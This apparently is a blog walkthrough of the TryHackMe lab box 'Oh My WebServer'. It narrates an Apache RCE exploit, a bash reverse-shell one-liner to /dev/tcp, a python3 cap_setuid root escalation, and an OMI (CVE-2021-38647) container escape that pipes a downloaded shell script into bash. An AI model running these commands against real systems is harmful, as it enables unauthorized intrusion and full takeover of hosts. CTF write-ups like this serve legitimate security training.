Oh My WebServer TryHackMe Walkthrough
Hello guys back again with another walkthrouh this time am going to be exploiting Oh My WebServer from TyrHackMe. The box was really well structured thanks to the author of the box tinyb0y. The box starts of by performing a nmap scan and discovering that the box is running a vulnerable Apache web server and using an exploit we get a shell on the system. Doing a little bit of enumeration we discovered that we landed on a docker container and not the host operating system. Using linpeas we discover that python has the cap_setuid capability set and we can exploit this to get root on the docker container. Then we’ll use CVE-2021–38647 to escalate to the root OS and read the root flag. without much say let jump in
As always we’ll start of by performing a nmap scan. This will give us a better understanding of the services that are running on the box
Looking at the screenshot below we discover that 2 port are open
- Secure shell (SSH) running on port 22
- Apache web server (HTTP) running on port 80
SSH requires us to have correct credentials to access it and since we are in the initial stages of enumeration we don’t even have a correct name of a user that we know exists on the system meaning we really can’t do much with SSH at the moment hence i decided to enumerate HTTP
The other interesting information given to us by nmap is version information!. Looking at the version of Apache server that’s running we can come to a conclusion that it’s vulnerable to a remote code execution (RCE). This is a vulnerability that allows execution of arbitrary commands on a system. Looking for an exploit online we get one in exploitdb.
I copied the exploit to my box and run it using the arguments requires and looking at the screenshot below we get the output back
The argument targets.txt — was just a file on my system which contained the IP Address of the vulnerable system
The fact that we see the output means that our exploit works . This is an example of a classic command injection. In other occasions you’ll find that a system is vulnerable but you don’t get an output(blind remote code execution) and might assume a system was not vulnerable but what you got was a false negative that’s why i prefer performing a ping request back to my system. Depending on seeing the output might sometimes lead you to a rabbit hole but in our case we did need to perform a ping request
Next step is getting a shell on the system. i just used a one liner bash reverse shell to get a shell on the system
bash -c 'bash -i >& /dev/tcp/10.8.2.58/9001 0>&1'
Before running the command i did set up a netcat listener on port 9001 on my kali box
Then executed the exploit with the bash reverse shell. Looking at the screenshot below we get a shell on the system
Nice. Looking at the root of the file system we see a file .dockerenv that informs us that we are inside a docker container
The same information can be gotten from the IP Address of the system.
The IP Address 172.17.*.* most likely will belong to a docker container. In the docker container we are running as the user daemon. Next step is probably escalating our privilege to the root user on the system. I uploaded linpeas to the system and ran it.
Looking at linpeas result we see that python3 has the cap_setuid capability set
Looking at GTFOBINs we get a one liner command that will exploit the misconfiguration and get us a root shell on the system
python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
Running the command on the system we get a root shell on the docker container
Going to the root’s user home directory we get the user.txt flag
We can submit the flag on TryHackMe and earn the points. Next step is somehow escaping the docker container and getting a root shell on the host OS.
Next i uploaded nmap to the box and scanned the gateway which had an IP Address of 172.17.0.1.
This reason as to why i did this was because other enumeration with linpeas didn’t yield much results.
Looking at the results returned by nmap we see that port 5986 is open
The port is usually used for windows remoting and the year 2021 it had an exploit for linux boxes
Looking though articles we discover that the OMI agent runs as root with the highest privileges on the system meaning if we successfully exploit it we’ll become root on the host system. Looking at the temp folder we get an exploit called omi.py left on the system
I guess the author of the box forgot to clean up or didn’t not really sure
But the exploit requires us to specify target and a command to be ran
First i created another netcat listener on port 9001
Next i created a bash script containing my bash reverse shell and named the script shell.sh
Next i started a web server on port 8000 that will host my bash reverse shell payload
lastlt I specified a target and a command to be ran which was my bash reverse shell command hosted on my system. THe command that i used was
python3 omi.py -t 172.17.0.1 -c "curl 10.8.2.58:8000/shell.sh | bash"
Looking at the screenshot below i got a root shell on the hosts system
I navigated to the root folder and got the root flag
Now we can submit the flag and get the final points. And the box is pretty much done!!!
I hope you enjoyed the walkthrough if so clap for me down below and follow me so that you won’t miss any upcoming walkthroughs